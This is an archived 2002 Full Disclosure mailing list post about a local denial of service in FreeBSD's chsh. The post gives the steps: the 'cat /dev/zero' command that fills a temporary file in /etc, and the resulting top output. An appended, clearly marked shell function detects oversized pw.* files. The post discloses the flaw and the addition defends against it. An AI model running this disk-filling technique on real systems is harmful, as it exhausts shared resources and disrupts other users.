Full Disclosure mailing list archives

FBSD chsh DoS


From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Thu, 15 Aug 2002 13:00:38 -0600

I found an interesting couple of related DoS to do against chsh on
FBSD. Basically chsh creates a temporary file in /etc and then
launches a user defined EDITOR. Anyways I couldn't find a way to
exploit it but I did find a way to be annoying.

tty1$ chsh

even if you just launch vi you can get the name of the temporary file
it created in /etc or just do ls.

ls -l /etc/pw.a1MwaM
-rw-------  1 core  core  330088448 Aug 15 01:44 /etc/pw.a1MwaM

Er that's after I was being annoying hehehe... filled 60G on phased
machine. Sorry phased! :D

tty2$ cat /dev/zero > /etc/pw.a1MwaM

Then go back to your vi session in chsh and :wq!... The results are
that basically root can't even remove the file while it's being
written to and of course lots of cpu overload abounds. Anyways quotas
will stop this but how many admins put user quotas on filesystems that
users aren't supposed to be writing to?

  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
14139 core      55   0  1140K   612K RUN     12:55 90.23% 90.23% chsh
14171 core      30   0  1912K   976K RUN      0:01  7.81%  2.83% top
13083 root       2   0   356K     0K nfsd     3:00  0.00%  0.00% nfsd

peace,
core

--
  Charles Stevenson (core) <core () bokeoa com>
  Lab Assistant, College of Eastern Utah San Juan Campus
  http://www.bokeoa.com/~core/core.asc
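
Added example, not part of the original post: a shell function an administrator could run periodically to flag an oversized pw.* temporary file like the one listed above, since a legitimate chsh edit buffer is only a few hundred bytes. The function name and the 64 KB default limit are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post).
# Assumptions: the name scan_pw_tmp and the 64 KB default threshold.
#
# scan_pw_tmp [DIR] [MAX_KB]
#   Looks at regular files named pw.* directly inside DIR (default /etc),
#   the naming pattern of the chsh temporary file shown in the post.
#   For each one larger than MAX_KB kilobytes it prints one line:
#       <numeric uid> <size in bytes> <path>
#   Returns 1 if at least one oversized file was found, 0 otherwise,
#   so it can gate an alert:  scan_pw_tmp /etc 64 || logger "pw.* tmp file too big"
scan_pw_tmp() {
    dir=${1:-/etc}
    max_kb=${2:-64}

    # -size +Nk works on both FreeBSD and GNU find; ls -ln gives the
    # numeric owner in field 3 and the byte size in field 5.
    hits=$(find "$dir" -maxdepth 1 -type f -name 'pw.*' -size +"${max_kb}"k \
               -exec ls -ln {} + 2>/dev/null |
           awk '{ print $3, $5, $NF }')

    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}
```

The uid column identifies the account whose chsh session owns the file, which is the process to stop before the file can be removed.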

